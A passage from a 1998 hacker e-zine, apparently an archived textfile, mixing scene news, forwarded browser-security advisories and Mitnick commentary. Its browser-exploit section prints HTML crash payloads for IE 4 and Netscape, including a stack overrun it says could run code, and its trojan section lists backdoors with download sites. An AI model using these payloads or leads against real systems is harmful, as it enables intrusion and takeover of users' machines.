home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Textfiles / zines / HWA / HWA-hn2.txt.sit / HWA-hn2.txt
Text File  |  1998-12-16  |  59KB  |  1,461 lines

  1.    [42:65:67:69:6E]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65] 
  2.    
  3.  ==========================================================================
  4.  =                    <=-[ HWA.hax0r.news ]-=>                            =
  5.  ==========================================================================
  6.   HWA.hax0r.news                      Number 2 Volume 1 December 13th 1998
  7.  ==========================================================================
  8.  
  9.  
  10.    Synopsis
  11.    --------
  12.  
  13.    The purpose of this list is to 'digest' current events of interest that
  14.   affect the online underground and netizens in general. This includes
  15.   coverage of general security issues, hacks, exploits, underground news
  16.   and anything else I think is worthy of a look see.
  17.  
  18.    This list is NOT meant as a replacement for, nor to compete with, the
  19.   likes of publications such as CuD or PHRACK or with news sites such as
  20.   AntiOnline, the Hacker News Network (HNN) or mailing lists such as
  21.   BUGTRAQ or ISN nor could any other 'digest' of this type do so.
  22.  
  23.    It *is* intended  however, to  compliment such material and provide a
  24.   reference to those who follow the culture by keeping tabs on as many
  25.   sources as possible and providing links to further info, its a labour
  26.   of love and will be continued for as long as I feel like it, i'm not
  27.   motivated by dollars or the illusion of fame, did you ever notice how
  28.   the most famous/infamous hackers are the ones that get caught? there's
  29.   a lot to be said for remaining just outside the circle... <g>
  30.  
  31.  
  32.      @HWA
  33.      
  34.   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
  35.             Welcome to HWA.hax0r.news ... #2
  36.   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
  37.  Issue #2
  38.  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
  39.  
  40.  Section  Content
  41.  ------- ------------------------------------------------------------------
  42.   0.0 ... Who am we?
  43.   0.1 ... COPYRIGHTS
  44.   1.0 ... Sources
  45.   1.1 ... Last minute stuff, rumours and newsbytes
  46.   1.2 ... I wanna be 'leet!, how do I hack?
  47.   2.0 ... From the editor
  48.   2.1 ... The USAF Information Warfare Center: Sensor Combat
  49.   3.0 ... Latest Web Browser Exploits
  50.   4.0 ... NETBUS news
  51.   4.1 ... Windows trojans on the rise ...
  52.   4.2 ... Is it cool to hate Kevin Mitnick?
  53.   4.3 ... Mitnick Speaks
  54.   4.4 ... Sinnerz and the Genius
  55.   4.5 ... More Cash Cowz and k00l t00lz
  56.   4.6 ... SAFER (Siam relay's security newsletter)
  57.   5.0 ... Trinux, a micro linux distribution and security tool kit
  58.   5.1 ... Getting A new IDENTITY
  59.   5.2 ... Credit card phraud
  60.   6.0 ... Packet Storm Security is in trouble!
  61.   6.1 ... Latest exploits & hacks (SSHD etc)
  62.   6.2 ... cDc releases a new ButtSniffer
  63.   6.3 ... BOFREEZE crashes BO attackers
  64.   7.0 ... Hacking IRC'98 : Part 1:  Crashing Eggdrop bots
  65.   7.1 ... Hacking Websites, (Easier than sucking the salt off your nuts?)
  66.   8.0 ... ROOTFEST'99
  67.   9.0 ... PHACVW linx
  68.  
  69.     -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=---
  70.     
  71. 0.0  Who is the editor and why is (s)he writing this?
  72.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  73.      
  74.     Who cares?
  75.     ~~~~~~~~~~
  76.     
  77.     I am noone, a nobody, I am not a phed or a narq, I could be you. I do
  78.     this for myself and some friends, you get something out of it too?
  79.     'whump, there it is'. Thats all there is to it, nothing more, Neither
  80.     am I a "hax0r" or a "cracker" and hell if I were, you think i'd
  81.     broadcast it all over some crummy news sheet? heh, get over it, this
  82.     is meant to be a fun read, nothing more, so get reading. and if you ain't
  83.     smiling, you're taking things much too seriously. Keep hacking and stay
  84.     free ... w00t.
  85.  
  86.     C*:.
  87.  
  88.      -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
  89.  
  90. 0.1  (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT?
  91.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  92.  
  93.      This file is NOT copyright, some of the content however IS and is
  94.     marked as such. Copywritten material is used for review purposes only,
  95.     no monies are made or sought through the distribution of this material.
  96.     If you have a problem or concern email me and we'll discuss it.
  97.  
  98.     C*:.
  99.  
  100.      @HWA
  101.  
  102.  
  103. 1.0  Sources ***
  104.      ~~~~~~~~~~~
  105.  
  106.      Sources can be some, all, or none of the following (by no means complete
  107.     nor listed in any degree of importance) Unless otherwise noted, like msgs
  108.     from lists or news from other sites, articles and information is compiled
  109.     and or sourced by Cruciphux no copyright claimed.
  110.  
  111.   News/Hacker site................. http://www.bikkel.com/~demoniz/
  112.   News (New site unconfirmed).......http://cnewz98.hypermart.net/
  113.   News & I/O zine ................. http://www.antionline.com/
  114.   News + Exploit archive ...........http://www.rootshell.com/beta/news.html
  115.   News,Advisories,++ ...............http://www.l0pht.com/
  116.   News site (HNN/l0pht),............http://www.hackernews.com/
  117.   Back Orifice/cDc..................http://www.cultdeadcow.com/
  118.   News site+........................http://www.zdnet.com/
  119.   Help Net Security.................http://help.ims.hr
  120.   NewsTrolls (HNN)..................http://www.newstrolls.com/
  121.   HiR:Hackers Information Report... http://axon.jccc.net/hir/
  122.   CuD ..............................http://www.soci.niu.edu/~cudigest
  123.  
  124.   +Various mailing lists and some newsgroups, such as ...
  125.  
  126.   http://www.the-project.org/ .. IRC list/admin archives
  127.   http://www.anchordesk.com/  .. Jesse Berst's AnchorDesk
  128.  
  129.   alt.hackers.malicious
  130.   alt.hackers
  131.   alt.2600
  132.   BUGTRAQ
  133.   ntbugtraq
  134.   ISN security mailing list
  135.  
  136.   NEWS Agencies, News search engines etc:
  137.   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  138.  
  139.   http://search.yahoo.com.sg/search/news_sg?p=cracker
  140.   http://www.cnn.com/SEARCH/
  141.   http://www.news.com/Searching/Results/1,18,1,00.html?querystr=cracker
  142.   http://www.foxnews.com/search/cgi-bin/search.cgi?query=cracker&days=0&wires=0&startwire=0
  143.   http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=cracker
  144.  
  145.      Referenced news links
  146.      ~~~~~~~~~~~~~~~~~~~~~
  147.      
  148.      "Rogues Gallery" - Interesting Hackers Timeline.
  149.           http://www.wired.com/news/news/politics/story/14856.html
  150.  
  151.  
  152.       *** Feel free to send in sources of information that you feel provide good
  153.           coverage or archives of hacker material and i'll add it to the list.
  154.  
  155.       *** For obvious reasons not all sources are disclosed (duh)
  156.   
  157.      @HWA
  158.  
  159. 1.1  Last minute stuff, rumours and newsbytes
  160.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  161.  
  162.     +++  Dec 12:Justin Petersen aka Agent Steal has been arrested by US
  163.          Marshals, story on ZDnet:
  164.          http://www.zdnet.com/zdnn/stories/news/0,4586,2175287,00.html
  165.  
  166.     +++  Some versions of NetBus Killer have been infected with a virus, the
  167.          virus is in the uninstall.exe program.
  168.  
  169.     +++  Keen Veracity, new hacking zine by Legions of the Underground
  170.          http://www.Genocide2600.com/~tattooman/keen/kv5.txt
  171.  
  172.     +++  "Are hackers today selling out?" by Space Rogue
  173.          http://www.hackernews.com/orig/sellout.html"
  174.  
  175.  
  176.     +++  Securing Redhat Linux v5.x - Interesting online book in progress.
  177.          http://www.shopthenet.net/redhat-security/index.html
  178.  
  179.     +++  Dark Eclipse Software (Backdoor trojan, and new trojan killer software
  180.          "CC" (condom cleaner):  http://surf.to/des
  181.  
  182.     +++  Use your PalmPilot to steal cars ..
  183.          http://www.newscientist.com/ns/981205/newsstory6.html
  184.  
  185.     +++  Use you PalmPilot to redbox calls in Canada ...
  186.          http://www.hackcanada.com/
  187.  
  188.     +++  How the DoD cleans up after "spillage" of classified data..
  189.          http://www.antionline.com/SpecialReports/cdata/
  190.  
  191.  
  192.     +++  From 100% Pure Bikkel:
  193.          A bug in Microsoft's NT Server 4.0 can expose a server's user
  194.          groups and users. It only effects NT servers with no firewall
  195.          protection. The security breach was discovered last week by
  196.          Vitali Chkliar. ZDNet reported earlier this week about the
  197.          hole and wrote that  Chkliar had a webpage with 10 companies
  198.          listed as susceptible but did not list them for security reasons
  199.          see the links below for more info:
  200.  
  201.          http://www.bikkel.com/~demoniz/
  202.          http://209.4.32.66/NTSecurity/default.asp
  203.          http://www.zdnet.com/windows/stories/main/0,4728,374497,00.html
  204.        
  205.     
  206.     @HWA
  207.      
  208.  
  209. 1.2  How do I hack?
  210.      ~~~~~~~~~~~~~~
  211.  
  212.       You should probably be asking 'how do I crack?' but thats another story
  213.     I couldn't leave this alone... so you wanna be a hacker and learn 'mad
  214.     sk1llz' huh? well first off here are two snippets from a good article
  215.     from AntiOnline for you to read over.
  216.  
  217.     Article quotes: http://www.antionline.com/SpecialReports/reflux/
  218.  
  219.     This article is about the group "ViRii" and their attacks on US govt
  220.     computers, but it could be about you and your school or whatever ...
  221.  
  222.     1) So, you're too 'leet to get busted? maybe, maybe not ...
  223.  
  224.      "You think you have mad skills?, You and your crew are the best?...
  225.      Thinking your too good to be caught?, Let me tell you... your never
  226.      going to be caught, your techniques are so goddam elite that you could
  227.      never be caught by the feds."
  228.  
  229.      "Your Seriously fucking mistaken...Theres somebody out there who is
  230.      better then you and they are watching you. -Reflux "
  231.  
  232.  
  233.     2) Oh and by the way, its not not just YOUR shit that gets messed with:
  234.  
  235.        "After Makaveli and TooShort were raided, the agents had proceeded to
  236.        Calldan Coffman's Parents residence in North Bend Oregon where they
  237.        had confiscated his parents computer hardware and software and went to
  238.            ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  239.        his grandparents house where they collected more computer equipment and
  240.            ~~~~~~~~~~~~       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  241.        software.
  242.        ~~~~~~~~~
  243.  
  244.       They then raided us, they handed LoaD the Search Warrant and Arrested
  245.       Calldan Coffman, under federal Arrest Warrants, then they confiscated
  246.                                                       ~~~~~~~~~~~~~~~~~~~~~
  247.       all the computer hardware and software and tore the place apart, they
  248.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  249.       had detained Me, LoaD and Kytten from ViRii and had cuffed Calldan and
  250.       moved him."
  251.  
  252.       So, if you have to ask the question 'how do I hack?' or 'how do I become
  253.      a hacker?' etc then you may as well give up now, you'll just end up in
  254.      jail. Memorizing "the Mentor's last words" isn't enough .. install FreeBSD
  255.      Trinux, or Linux on your system, play with it, if you develop a knack for
  256.      code try contributing to the FreeBSD or Linux (etc) projects, you'll get
  257.      'mad recognition' and help out the community to boot, oh yeah and the feds
  258.      won't come and take away daddy's computer system.
  259.  
  260.     
  261.      @HWA
  262.      
  263.  
  264. 2.0  From the editor:
  265.      ~~~~~~~~~~~~~~~
  266.  
  267.      START
  268.      ~~~~~
  269.        Yeah issue #2 w00t. issue #1 came and went and we survived to tell 
  270.      about it, quite the feat. The 1st 'issue' was mainly a preview deal 
  271.      hopefully this one will not be too unwieldly however it won't be any
  272.      meagre 20k file this time and I make no apologies for that, we're about
  273.      content and news and providing it untarnished by corporate entities or 
  274.      phed contamination.
  275.  
  276.      So... since i'm too tired to write more here and need to crash for a 
  277.      while before installing the latest FreeBSD snap on my backup machine 
  278.      i'll end with an invitation to send in information or articles for 
  279.      inclusion in future issues, just mail it or send as a file attach to
  280.      the addy below privacy and discretion assured (of course).
  281.  
  282.      Congrats, thanks, articles, news submissions and kudos to
  283.      hwa@press.usmc.net complaints and all nastygrams and mailbombs can go
  284.      to /dev/nul nukes, synfloods and smurfs to 127.0.0.1
  285.  
  286.      danke.
  287.  
  288.      C*:.
  289.  
  290.  
  291.      @HWA
  292.  
  293.  
  294. 2.1  The USAF Information Warfare Center: Sensor Combat
  295.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  296.  
  297.      CONSENT TO MONITORING
  298.  
  299.      THIS IS A DEPARTMENT OF DEFENSE COMPUTER SYSTEM. THIS COMPUTER SYSTEM,
  300.      WHICH INCLUDES ALL RELATED EQUIPMENT, NETWORKS AND NETWORK DEVICES
  301.      (SPECIFICALLY INCLUDING ACCESS TO THE INTERNET), ARE PROVIDED ONLY FOR
  302.      OFFICIAL U.S. GOVERNMENT BUSINESS.
  303.  
  304.      DOD COMPUTER SYSTEMS MAY BE MONITORED BY AUTHORIZED PERSONNEL TO ENSURE
  305.      THAT THEIR USE IS AUTHORIZED, FOR MANAGEMENT OF THE SYSTEM, TO FACILITATE
  306.      PROTECTION AGAINST UNAUTHORIZED ACCESS, AND TO VERIFY SECURITY PROCEDURES.
  307.      MONITORING INCLUDES "HACKER" ATTACKS TO TEST OR VERIFY THE SECURITY OF
  308.      THIS SYSTEM AGAINST USE BY UNAUTHORIZED PERSONS. DURING THESE ACTIVITIES,
  309.      INFORMATION STORED ON THIS SYSTEM MAY BE EXAMINED, COPIED AND USED FOR
  310.      AUTHORIZED PURPOSES, AND DATA OR PROGRAMS MAY BE PLACED INTO THIS SYSTEM.
  311.      THEREFORE, INFORMATION YOU PLACE ON THIS SYSTEM IS NOT PRIVATE.
  312.  
  313.      USE OF THIS DOD COMPUTER SYSTEM, AUTHORIZED OR UNAUTHORIZED, CONSTITUTES
  314.      CONSENT TO OFFICIAL MONITORING OF THIS SYSTEM. UNAUTHORIZED USE OF A DOD
  315.      COMPUTER SYSTEM MAY SUBJECT YOU TO CRIMINAL PROSECUTION. EVIDENCE OF
  316.      UNAUTHORIZED USE COLLECTED DURING MONITORING MAY BE PROVIDED TO APPROPRIATE
  317.      PERSONNEL FOR ADMINISTRATIVE, CRIMINAL OR OTHER ACTION.
  318.  
  319.      Wargames
  320.      ~~~~~~~~
  321.  
  322.       You've probably heard of these guys or others like them, (the 609th
  323.      were recently featured on America At Arms on TV) they are the people
  324.      that are watching you after you get past the ".. monitored.." system
  325.      banner on *.mil computer networked boxes. If you haven't been busted
  326.      yet then you're probably not causing enough shit, but don't think for
  327.      one minute that you're not being watched... there are bigger fish to
  328.      fry in the InfoWar arena.
  329.  
  330.       Anyway, on to the fun stuff, I stumbled across the SensorCombat system
  331.      while doing research on the 609th and InfoWar topic, there are screen
  332.      shots available and the site promises to have a downloadable demo soon,
  333.      it looks pretty interesting. This isn't the 'Doom' 3d game you may have
  334.      seen the marines practicing with on tv its a tactical simulation game..
  335.      check it out.
  336.  
  337.      "The SENSOR COMBAT program is a single-player/user campaign-level series
  338.       of wargames, each game designed to illustrate the full dimension of
  339.       warfare.
  340.  
  341.       SENSOR COMBAT utilizes modern military strategy and tactics, but adds
  342.       the 5 pillars of IW in contemporary scenarios depicting missions
  343.       ranging from peacekeeping operations (Bosnia) to major regional
  344.       conflicts (Korea).  Political events can also impact the operation.
  345.       The goal is to create a computer-simulated battlefield where different
  346.       strategies can be evaluated, providing the player/student with insight
  347.       into gaining information dominance."
  348.  
  349.  
  350.      Sources/References/Related links:
  351.  
  352.      Air Intelligence Agency, Information Warfare, Kelly AFB
  353.      http://www.aia.af.mil/
  354.      http://www.afiwc.aia.af.mil/what/SensorCombat/SensorCombat.html
  355.  
  356.      http://www.af.mil/lib/afissues/1998/issue98.html
  357.  
  358.      Crypt newsletter article:
  359.      http://www.soci.niu.edu/~crypt/other/609.htm
  360.  
  361.      FAS article (Federation of American Scientists)
  362.      http://www.fas.org/irp/agency/aia/cyberspokesman/97aug/afiwc.htm
  363.      
  364.      
  365.      @HWA
  366.   
  367.  
  368. 3.0  Latest Web Browser Exploits
  369.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  370.      So you have the latest Netscape or MSIE? well its probably vulnerable
  371.     to at least one exploit.
  372.  
  373.  
  374.     Alert: IE 4.0 Security Zone compromise
  375.     Aleph One (aleph1@DFW.NET)
  376.     Tue, 20 Oct 1998 11:06:13 -0500
  377.  
  378.     New Internet Explorer vulnerability. As opposed to what Russ states below
  379.     there is a new risk created by this vulnerability. The default setting for
  380.     authentication in IE for the Medium security setting is to automatically
  381.     logon to machines in the Intranet zone when the web server requests user
  382.     authentication without prompting the user. Nice way for someone to go
  383.     finishing for passwords by posting some message with an embedded URL in a
  384.     newsgroup or mass emailing some corporation.
  385.  
  386.     Aleph One / aleph1@dfw.net
  387.     http://underground.org/
  388.     KeyID 1024/948FD6B5
  389.     Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01
  390.  
  391.     ---------- Forwarded message ----------
  392.     Date: Mon, 19 Oct 1998 21:06:16 -0400
  393.     From: Russ <Russ.Cooper@RC.ON.CA>
  394.     To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
  395.     Subject: Alert: IE 4.0 Security Zone compromise
  396.  
  397.     Sune Hansen, Webmaster of <http://www.WorldWideWait.com>, discovered a
  398.     security problem which affects Trust Zones within Internet Explorer
  399.     4.0+.
  400.  
  401.     Basically, if you provide IE with <http://3475932041>, you'll arrive at
  402.     Microsoft's web site. However, it will be listed, and treated, as part
  403.     of your Local Intranet Zone when in fact it should be part of any other
  404.     zone.
  405.  
  406.     For anyone who has made no modifications to their zones (i.e. using the
  407.     defaults supplied with IE), there is no difference since both Local
  408.     Intranet Zone and Internet Zone are set to "Medium" security.
  409.  
  410.     If, however, modifications have been made to the zone security
  411.     configuration such that, for example, the Internet Zone is more
  412.     restrictive than the Local Intranet Zone, then the fact such 32-bit URLs
  413.     end up being seen by IE as trusted can create a problem.
  414.  
  415.     IE appears to assume that anything it sees without a period in the URL
  416.     should be treated as part of the Local Intranet Zone. Winsock then takes
  417.     the address and properly translates it to a reachable IP address (you
  418.     could just as easily use PING or some other utility with such an
  419.     address).
  420.  
  421.     Sune tested this on Windows '98, and I've tested it on NT 4.0 SP4 RC2
  422.     with IE 4.0 (SP1;2735 - 4.72.3110.8), and both caused the same problem.
  423.  
  424.     Essentially the problem exists within IE, and not NT, but since Sune is
  425.     franticly seeking out media outlets to report the story, I figured it
  426.     was worth a note here. Microsoft did receive a brief message from Sune
  427.     on Sunday morning, although they were made more aware of the issues by
  428.     the media trying to verify Sune's claims.
  429.  
  430.     I'm not trying to downplay the problem. Anyone who is using Trust Zones
  431.     should understand that they, alone, will not prevent a site from placing
  432.     a URL in the above fashion and causing a site to be viewed as a Local
  433.     Intranet Zone site. Proxies, and Firewalls, however, are not affected by
  434.     this and will properly enforce restrictions if so configured. The
  435.     problem appears to reside entirely within the mechanism that IE uses to
  436.     determine if something is part of the Local Intranet Zone when no
  437.     servers are configured in that zone.
  438.  
  439.     My conversations with Microsoft indicate we will hear more when they
  440.     have more fully investigated the ramifications of the issue.
  441.     
  442.     Cheers,
  443.     Russ
  444.     
  445.     MSIE Exploits and crashing
  446.     ~~~~~~~~~~~~~~~~~~~~~~~~~~
  447.     Microsoft Internet Explorer 4.0(1) (3.02 is reported not to be vulnerable) 
  448.     under win95, win98 and NT can be crashed and eventually made execute arbitrary code 
  449.     with a little help from the <EMBED> tag.
  450.  
  451.     The following:
  452.     <EMBED SRC=file://C|/A.ABOUT_200_CHARACTERS_HERE___________________>
  453.     opens a dialog box and closes IE 4.0.
  454.     It seems that the long file extension causes stack overrun.
  455.  
  456.     The stack is smashed - full with our values, EIP is also ours and CS=SS.
  457.     So a string could be constructed, executing code at the client's machine.
  458.  
  459.  
  460.     Solution: Microsoft has issued a patch at their site - "Embed issue".
  461.     To try this: http://www.geocities.com/ResearchTriangle/1711/msie.html
  462.  
  463.  
  464.     Georgi Guninski
  465.     http://www.geocities.com/ResearchTriangle/1711
  466.  
  467.     -----------------------[ Start crash code ]--------------------- 
  468.     <HTML>
  469.     Trying to crash IE 4.71
  470.     <EMBED SRC=file://C|/A.012345678901234567890123456789012345678901234567890123456
  471.     78901234567890123456789012345678901234567890123456789012345678901234567890123456
  472.     78901234567890123456789012345678901234567890123456789012345678901234567890123456
  473.     78901234567890123456789>
  474.     </HTML>
  475.     -----------------------[ end crash code ]------------------------ 
  476.  
  477.  
  478.  
  479.     This url will crash MSIE 4.x
  480.     http://
  481.     
  482.     This code will crash MSIE 4.0 and 4.01
  483.     
  484.     http://www.geocities.com/ResearchTriangle/1711/external.html    
  485.     
  486.     This code will crash Microsoft Explorer 4.71:                             
  487.     
  488.     -----------------------[ Start crash code ]--------------------- 
  489.     <HTML>
  490.     Crashing IE 4.71
  491.     <OBJECT CLASSID=A¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
  492.     ¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
  493.     ¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
  494.     ¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
  495.     ¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
  496.     ¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
  497.     ¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿>
  498.     </OBJECT>
  499.     <BR>
  500.     </CENTER>
  501.     </HTML>
  502.     -----------------------[ end crash code ]------------------------ 
  503.  
  504.  
  505.  
  506.     Netscape #1
  507.     ~~~~~~~~~~~
  508.     -----------------------[ Start crash code ]--------------------- 
  509.     <html>
  510.     <head>
  511.     <title>NS Go Boom</title>
  512.     </head>
  513.     <body>
  514.     <table>
  515.     <tr><td>
  516.     <p style="border: none">
  517.     BOOM!
  518.     </td></tr>
  519.     </table>
  520.     You won't see this text.
  521.     <p><a href="http://members.tripod.com/~hwa_2k/">Some Url</a>
  522.     </body>
  523.     </html>
  524.     -----------------------[ end crash code ]------------------------ 
  525.  
  526.     Netscape #2
  527.     ~~~~~~~~~~~
  528.  
  529.      Georgi Guninski wrote:
  530.  
  531.      > There is a bug in Netscape Communicator 4.5 for Windows 95 and 4.05 for
  532.      > WinNT 4.0
  533.      > (probably others) which allows reading files from the user's computer.
  534.      > It is not necessary the file name to be known, because directories may
  535.      > be browsed.
  536.      > The contents of the file may be sent to an arbitrary host. In order this
  537.      > to work, you need both Java and Javascript
  538.      > enabled. The bug may be exploited by email message.
  539.      >
  540.      > Demonstration is available at:
  541.      > http://www.geocities.com/ResearchTriangle/1711/b6.html
  542.      >
  543.      > Workaround: Disable Javascript or Java.
  544.      >
  545.  
  546.      I have just tested this bug in Netscape 4.5 on a RedHat Linux 5.1 machine,
  547.      Kermel 2.0.34 and with minor patching of the java, it is also effective.  I
  548.      was sucessful in retrieving ANY LOCAL FILE with the World readable
  549.      attribute. This includes the /etc/passwd file!  In netscape,
  550.      Edit>Preferences>Advanced>Disable Javascript in Mail and News will block
  551.      this exploit, unless the person has access to your web server.
  552.         
  553.  
  554.      Directly related/Good resources:
  555.     
  556.      http://www.geocities.com/ResearchTriangle/1711/index.html (George Guninski)
  557.      http://www.cen.uiuc.edu/~ejk/browser-security.html
  558.      http://www.microsoft.com/security/bulletins/
  559.  
  560.      Sorta related/interesting:    
  561.     
  562.      http://nosik.neystadt.org/nosik/SSI/morejava.html
  563.     
  564.      @HWA
  565.     
  566. 4.0  NETBUS News
  567.      ~~~~~~~~~~~
  568.        Last issue I posted a bunch of urls where Netbus was seen, prompting a
  569.      "will the real home page please stand up?" response <g> well demoniz has
  570.      posted that the current netbus home page (current version is 1.70 btw)
  571.      is on Angelfire at:
  572.  
  573.      http://www.angelfire.com/ab/netbussite/
  574.  
  575.      You can bet it won't be there for long, also HNN's main site has reported
  576.      the homepage can be found on a Brazillian server at:
  577.  
  578.      http://www.nwh.he.com.br/
  579.      
  580.      @HWA
  581.  
  582. 4.1  Windows Trojans on the rise..
  583.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  584.  
  585.      I have recently found many new trojans presumeably inspired by the
  586.      infamous cDc Back Orifice and the Netbus trojans, both of which I have
  587.      tested and found quite effective. I decided to take a look at what
  588.      else was floating around and the following is a brief list of what i
  589.      was able to uncover, I've not had a chance to try these all out yet but
  590.      intend to make them available or at least link to the sites where they
  591.      may be obtained so you can scrutinize them. What you don't know CAN and
  592.      DOES hurt you...
  593.  
  594.      Trojan list: (For my reference - = still need it, + = have it) if you
  595.      have one of the 'needs' or know where I can find it for review purposes
  596.      please mail me. tnx.
  597.  
  598.      -Acid Shiver
  599.      +BackDoor
  600.      +BackOffrice
  601.      ?Control du Socket
  602.      +Control Access
  603.      +Deep Throat
  604.      +Gatecrasher
  605.      -Gjamer
  606.      -Girlfriend (and boyfriend) client/server (Not released yet)
  607.      +ICQ Trojan
  608.      +MastersParadise
  609.      -Millennium (not released yet - HCVORG site)
  610.      +NetBus
  611.      +NetSpy
  612.      -phAse zero
  613.      -RAW
  614.      -SysProtect 98
  615.      +Sockets Du Trois
  616.      -TeleCommando
  617.  
  618.      A couple of sites where trojans may be found:
  619.  
  620.      http://www.ufl.edu/~cycy92n/........ PHAC site - trojan files
  621.      http://www.legion2000.org/hcvorg/ .. PHAC site - HcVORG Trojan files
  622.  
  623.      @HWA
  624.  
  625.  
  626. 4.2  Is it cool to hate Kevin Mitnick?
  627.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  628.  
  629.      "How do criminals guilty of committing brutal racial crimes
  630.       avoid jail altogether... why are defendants accused by the
  631.       US Government of running organized crime granted bail...
  632.       Why is Kevin Mitnick being treated more harshly than these
  633.       criminals?" - http://www.kevinmitnick.com/home.html
  634.  
  635.  
  636.       In order to truly be elite, you don't want a FREE KEVIN banner on your
  637.      site, you don't want to stand up for basic human rights, you don't want
  638.      to educate yourself, you want to KILL KEVIN, FUCK KEVIN, BURN KEVIN.
  639.      Yeah man, maybe after you've been in jail for 3yrs without a trial like
  640.      Kevin Mitnick has you'll really be Fucking Hostile.
  641.  
  642.       This is the biggest bunch of shit i've seen in a long time, I can truly
  643.      understand where these people are coming from and the ideas behind the
  644.      outrage but I feel it is grossly misdirected. Sure there has been a lot
  645.      of exposure on the net, sure people are posting 'Free Kevin' virtual
  646.      stickers everywhere, and so they damn well should, haven't you gotten
  647.      the point yet? the U.S govt is making a mockery of basic civil rights
  648.      damn straight people are pissed off.
  649.  
  650.       It is NOT cool, it is NOT 'leet and it is completely STUPID to endorse
  651.      this sort of movement. Lets nix this now before the joke comes back and
  652.      bites you on the ass. If you don't know the story then shut the fuck up,
  653.      you have no right to comment on it. If you truly believe Kevin is getting
  654.      what he deserves then you are a misdirected moron or a fucking phed. - Ed
  655.      C*:.
  656.      
  657.      
  658.      @HWA
  659.            
  660.  
  661. 4.2a Comparitive Sentences of other hackers in the news...
  662.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  663.  
  664.      Sourced from: http://www.wired.com/news/news/politics/story/14856.html
  665.      And http://www.paranoia.com/
  666.  
  667.      Comparitive sentences:
  668.  
  669.  
  670.    1990 - ROBERT TAPPAN MORRIS  ("The InterNet Worm")
  671.           Sentence: three years probation, community service, fine.
  672.  
  673.    1990 - LEGION OF DOOM
  674.           Sentences: 14 to 21 months in prison
  675.  
  676.    1991 - KEVIN POULSEN
  677.           Sentence: four years in prison, three-year ban from computer use,
  678.           fine
  679.  
  680.    1992 - MOD (MASTERS OF DECEPTION)
  681.           Sentences: six months to one year in prison, community service,
  682.           probation
  683.  
  684.    1995 - JUSTIN TANNER PETERSEN
  685.           Sentence: 3.5 years in prison, restricted use of computers for
  686.           three years, fine
  687.  
  688.    1998 - JUSTIN TANNER PETERSEN Jailed/released for bail violation
  689.           ** Currently wanted for bail violation, has fled country.
  690.  
  691.  
  692.  
  693.      Anti-Kevin site:
